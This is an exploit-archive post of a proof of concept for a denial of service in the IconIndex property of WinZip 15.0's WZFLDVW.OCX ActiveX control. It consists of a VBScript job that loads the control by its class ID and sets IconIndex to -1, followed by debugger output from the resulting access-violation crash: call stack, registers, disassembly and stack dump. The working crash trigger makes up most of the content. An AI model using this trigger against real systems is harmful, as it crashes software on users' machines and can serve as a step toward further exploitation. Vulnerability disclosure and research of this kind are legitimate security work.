Winzip 15.0 WZFLDVW.OCX IconIndex Property Denial of Service

2010-12-06 15:15:14

# Exploit Title: Winzip WZFLDVW.OCX IconIndex property access violation
# Author: fady mohamed osman
# Software Link : http://www.winzip.com/downwz.htm
# Version: 15.0 (Build 9334)
# Tested on: Win XP Sp2
# CVE : N/A

# Website : http://www.darkmasters.co.cc/
# Twitter : http://twitter.com/Fady_Osman


<?XML version='1.0' standalone='yes' ?>
<package><job id='DoneInVBS' debug='false' error='true'>
<object classid='clsid:4E3770F4-1937-4F05-B9A2-959BE7321909' id='target' />
<script language='vbscript'>


'Wscript.echo typename(target)

'for debugging/custom prolog
targetFile = "C:\Program Files\WinZip\WZFLDVW.OCX"
prototype = "Invoke_Unknown IconIndex As Long"
memberName = "IconIndex"
progid = "FolderViewControl.TreeNode"
argCount = 1

arg1=-1

target.IconIndex = arg1

</script></job></package>

Exception Code: ACCESS_VIOLATION
Disasm: 1643C53 PUSH DWORD PTR [ESI+20]

Seh Chain:
--------------------------------------------------
1 180B82F wzfldvw.ocx
2 180B8F0 wzfldvw.ocx
3 73351571 VBSCRIPT.dll
4 73350F38 VBSCRIPT.dll
5 73351DA5 VBSCRIPT.dll
6 7335119D VBSCRIPT.dll
7 7C8399F3 KERNEL32.dll


Called From Returns To
--------------------------------------------------
wzfldvw.1643C53 wzfldvw.1631423
wzfldvw.1631423 wzfldvw.1666F8C
wzfldvw.1666F8C wzfldvw.16434A0
wzfldvw.16434A0 VBSCRIPT.73313A78
VBSCRIPT.73313A78 VBSCRIPT.733139F6
VBSCRIPT.733139F6 VBSCRIPT.73304B01
VBSCRIPT.73304B01 VBSCRIPT.73306959
VBSCRIPT.73306959 VBSCRIPT.73301E55
VBSCRIPT.73301E55 VBSCRIPT.73303A76
VBSCRIPT.73303A76 VBSCRIPT.7330BE2A
VBSCRIPT.7330BE2A VBSCRIPT.7330BEB9
VBSCRIPT.7330BEB9 SCROBJ.5CE4915E
SCROBJ.5CE4915E SCROBJ.5CE4CF9C
SCROBJ.5CE4CF9C SCROBJ.5CE4D0E2
SCROBJ.5CE4D0E2 SCROBJ.5CE4B106
SCROBJ.5CE4B106 SCROBJ.5CE4B49F
SCROBJ.5CE4B49F 100BB36
100BB36 1005EFE
1005EFE 1005215
1005215 100492B
100492B 1004A89
1004A89 1003C7B
1003C7B KERNEL32.7C816D4F


Registers:
--------------------------------------------------
EIP 01643C53
EAX BAADF00D
EBX 00000000
ECX BAADF00D
EDX 01642B94 -> 18EBD88B
EDI 00000008
ESI BAADF00D
EBP 0013EB1C -> 0013EB5C
ESP 0013EAF0 -> 00AE75F0


Block Disassembly:
--------------------------------------------------
1643C48 MOV EDI,EDI
1643C4A PUSH EBP
1643C4B MOV EBP,ESP
1643C4D SUB ESP,28
1643C50 PUSH ESI
1643C51 MOV ESI,ECX
1643C53 PUSH DWORD PTR [ESI+20] <--- CRASH
1643C56 CALL [182C978]
1643C5C TEST EAX,EAX
1643C5E JNZ SHORT 01643C65
1643C60 CALL 01635391
1643C65 MOV EAX,[EBP+8]
1643C68 TEST EAX,EAX
1643C6A JE SHORT 01643C60
1643C6C MOV [EBP-24],EAX


ArgDump:
--------------------------------------------------
EBP+8 BAADF00D
EBP+12 0013EB60 -> 01666F8C
EBP+16 00000022
EBP+20 BAADF00D
EBP+24 FFFFFFFF
EBP+28 0164299B -> 8B0020C2


Stack Dump:
--------------------------------------------------
13EAF0 F0 75 AE 00 0E 28 64 01 80 EB 13 00 28 ED 13 00 [.u....d.........]
13EB00 00 00 00 00 9B 29 64 01 DE 98 66 5E 08 00 00 00 [......d...f^....]
13EB10 60 EB 13 00 00 00 00 00 BA 75 91 7C 5C EB 13 00 [`........u..\...]
13EB20 23 14 63 01 0D F0 AD BA 60 EB 13 00 22 00 00 00 [..c.....`.......]
13EB30 0D F0 AD BA FF FF FF FF 9B 29 64 01 57 2B 64 01 [..........d.W.d.]



ApiLog
--------------------------------------------------

***** Installing Hooks *****
7c826cab CreateFileA(C:\WINDOWS\system32\rsaenh.dll)
7c826cab CreateFileA(C:\WINDOWS\system32\rsaenh.dll)

Fixes

No fixes

In order to submit a new fix you need to be registered.